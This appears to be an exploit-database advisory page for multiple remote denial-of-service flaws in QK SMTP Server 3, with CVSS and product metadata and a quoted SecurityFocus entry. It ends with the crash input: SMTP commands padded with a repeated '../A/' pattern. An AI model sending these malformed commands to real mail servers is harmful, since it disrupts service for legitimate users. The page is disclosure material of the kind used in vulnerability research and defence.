header-logo
Suggest Exploit
vendor:
QK SMTP Server
by:
Unknown
7.5
CVSS
HIGH
Remote Denial-of-Service
400
CWE
Product Name: QK SMTP Server
Affected Version From: QK SMTP Server 3
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE: a:qksoft:qk_smtp_server:3
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

QK SMTP Server Remote Denial-of-Service Vulnerabilities

Multiple remote denial-of-service vulnerabilities occur when handling malformed SMTP commands in QK SMTP Server. An attacker can exploit these issues by sending specific commands to crash the affected application, resulting in a denial of service for legitimate users.

Mitigation:

No known mitigation or remediation available.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/26856/info

QK SMTP Server is prone to multiple remote denial-of-service vulnerabilities that occur when handling malformed SMTP commands.

An attacker can exploit these issues to crash the affected application, denying service to legitimate users.

These issues affects QK SMTP Server 3; other versions may also be affected.

HELO ../A/ * 950
MAIL FROM: ../A/ * 950
RCPT TO: ../A/ * 950
data
../A/ * 950